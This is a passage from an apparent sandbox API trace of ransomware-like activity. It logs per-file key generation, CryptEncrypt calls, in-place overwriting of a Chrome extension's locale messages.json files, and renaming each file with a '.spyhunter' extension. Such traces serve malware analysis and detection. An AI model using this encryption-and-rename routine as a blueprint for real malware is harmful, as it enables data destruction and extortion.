halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0135.624] GetProcessHeap () returned 0x2c0000 [0135.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.624] GetProcessHeap () returned 0x2c0000 [0135.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.625] GetProcessHeap () returned 0x2c0000 [0135.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0135.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f650 | out: pbBuffer=0x248f650) returned 1 [0135.626] GetProcessHeap () returned 0x2c0000 [0135.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f648*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f648*=0x30) returned 1 [0135.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.626] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json") returned 157 [0135.626] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.627] GetProcessHeap () returned 0x2c0000 [0135.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.627] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f60c*=0xb3, lpOverlapped=0x0) returned 1 [0135.627] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.627] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f60c*=0xb3, lpOverlapped=0x0) returned 1 [0135.628] GetProcessHeap () returned 0x2c0000 [0135.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.628] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.628] WriteFile (in: hFile=0x158, lpBuffer=0x248f64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f60c, lpOverlapped=0x0 | out: lpBuffer=0x248f64c*, lpNumberOfBytesWritten=0x248f60c*=0x4, lpOverlapped=0x0) returned 1 [0135.628] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f60c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f60c*=0x30, lpOverlapped=0x0) returned 1 [0135.628] CloseHandle (hObject=0x158) returned 1 [0135.628] GetProcessHeap () returned 0x2c0000 [0135.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.628] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.spyhunter") returned 167 [0135.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ro\\messages.json.spyhunter")) returned 1 [0135.629] GetProcessHeap () returned 0x2c0000 [0135.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.629] GetProcessHeap () returned 0x2c0000 [0135.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.629] GetProcessHeap () returned 0x2c0000 [0135.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82060 | out: hHeap=0x2c0000) returned 1 [0135.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f648 | out: pbBuffer=0x248f648) returned 1 [0135.630] GetProcessHeap () returned 0x2c0000 [0135.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f640*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f640*=0x30) returned 1 [0135.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.631] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json") returned 160 [0135.631] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.631] GetProcessHeap () returned 0x2c0000 [0135.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.631] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f604*=0xb3, lpOverlapped=0x0) returned 1 [0135.632] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.632] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f604, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f604*=0xb3, lpOverlapped=0x0) returned 1 [0135.632] GetProcessHeap () returned 0x2c0000 [0135.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.632] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.632] WriteFile (in: hFile=0x158, lpBuffer=0x248f644*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f604, lpOverlapped=0x0 | out: lpBuffer=0x248f644*, lpNumberOfBytesWritten=0x248f604*=0x4, lpOverlapped=0x0) returned 1 [0135.632] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f604, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f604*=0x30, lpOverlapped=0x0) returned 1 [0135.633] CloseHandle (hObject=0x158) returned 1 [0135.633] GetProcessHeap () returned 0x2c0000 [0135.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.633] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 170 [0135.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0135.633] GetProcessHeap () returned 0x2c0000 [0135.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.633] GetProcessHeap () returned 0x2c0000 [0135.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.634] GetProcessHeap () returned 0x2c0000 [0135.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a190 | out: hHeap=0x2c0000) returned 1 [0135.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f640 | out: pbBuffer=0x248f640) returned 1 [0135.637] GetProcessHeap () returned 0x2c0000 [0135.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f638*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f638*=0x30) returned 1 [0135.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json") returned 160 [0135.638] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.638] GetProcessHeap () returned 0x2c0000 [0135.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.638] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f5fc*=0xb3, lpOverlapped=0x0) returned 1 [0135.639] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.640] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f5fc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f5fc*=0xb3, lpOverlapped=0x0) returned 1 [0135.640] GetProcessHeap () returned 0x2c0000 [0135.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.640] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.640] WriteFile (in: hFile=0x158, lpBuffer=0x248f63c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5fc, lpOverlapped=0x0 | out: lpBuffer=0x248f63c*, lpNumberOfBytesWritten=0x248f5fc*=0x4, lpOverlapped=0x0) returned 1 [0135.640] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5fc*=0x30, lpOverlapped=0x0) returned 1 [0135.641] CloseHandle (hObject=0x158) returned 1 [0135.641] GetProcessHeap () returned 0x2c0000 [0135.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.641] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.spyhunter") returned 170 [0135.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json.spyhunter")) returned 1 [0135.641] GetProcessHeap () returned 0x2c0000 [0135.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.642] GetProcessHeap () returned 0x2c0000 [0135.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.642] GetProcessHeap () returned 0x2c0000 [0135.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19e60 | out: hHeap=0x2c0000) returned 1 [0135.643] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f638 | out: pbBuffer=0x248f638) returned 1 [0135.643] GetProcessHeap () returned 0x2c0000 [0135.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.643] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f630*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f630*=0x30) returned 1 [0135.643] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.644] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0135.644] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.644] GetProcessHeap () returned 0x2c0000 [0135.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.644] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f5f4*=0xb3, lpOverlapped=0x0) returned 1 [0135.645] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.645] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x248f5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f5f4*=0xb3, lpOverlapped=0x0) returned 1 [0135.645] GetProcessHeap () returned 0x2c0000 [0135.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.645] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.645] WriteFile (in: hFile=0x158, lpBuffer=0x248f634*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5f4, lpOverlapped=0x0 | out: lpBuffer=0x248f634*, lpNumberOfBytesWritten=0x248f5f4*=0x4, lpOverlapped=0x0) returned 1 [0135.645] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5f4*=0x30, lpOverlapped=0x0) returned 1 [0135.645] CloseHandle (hObject=0x158) returned 1 [0135.645] GetProcessHeap () returned 0x2c0000 [0135.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.645] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.spyhunter") returned 167 [0135.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.spyhunter")) returned 1 [0135.646] GetProcessHeap () returned 0x2c0000 [0135.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.646] GetProcessHeap () returned 0x2c0000 [0135.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.647] GetProcessHeap () returned 0x2c0000 [0135.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81298 | out: hHeap=0x2c0000) returned 1 [0135.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f630 | out: pbBuffer=0x248f630) returned 1 [0135.648] GetProcessHeap () returned 0x2c0000 [0135.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f628*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f628*=0x30) returned 1 [0135.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0135.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0135.648] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.648] GetProcessHeap () returned 0x2c0000 [0135.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0135.648] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f5ec*=0x9f, lpOverlapped=0x0) returned 1 [0135.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.649] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f5ec*=0x9f, lpOverlapped=0x0) returned 1 [0135.649] GetProcessHeap () returned 0x2c0000 [0135.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0135.650] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.650] WriteFile (in: hFile=0x158, lpBuffer=0x248f62c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x248f62c*, lpNumberOfBytesWritten=0x248f5ec*=0x4, lpOverlapped=0x0) returned 1 [0135.650] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f5ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f5ec*=0x30, lpOverlapped=0x0) returned 1 [0135.650] CloseHandle (hObject=0x158) returned 1 [0135.650] GetProcessHeap () returned 0x2c0000 [0135.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0135.650] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.spyhunter") returned 167 [0135.650] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.spyhunter")) returned 1 [0135.651] GetProcessHeap () returned 0x2c0000 [0135.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0135.651] GetProcessHeap () returned 0x2c0000 [0135.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0135.651] GetProcessHeap () returned 0x2c0000 [0135.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0135.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f630 | out: pbBuffer=0x248f630) returned 1 [0135.651] GetProcessHeap () returned 0x2c0000 [0135.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0135.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f628*=0x20, dwBufLen=0x30 | out: 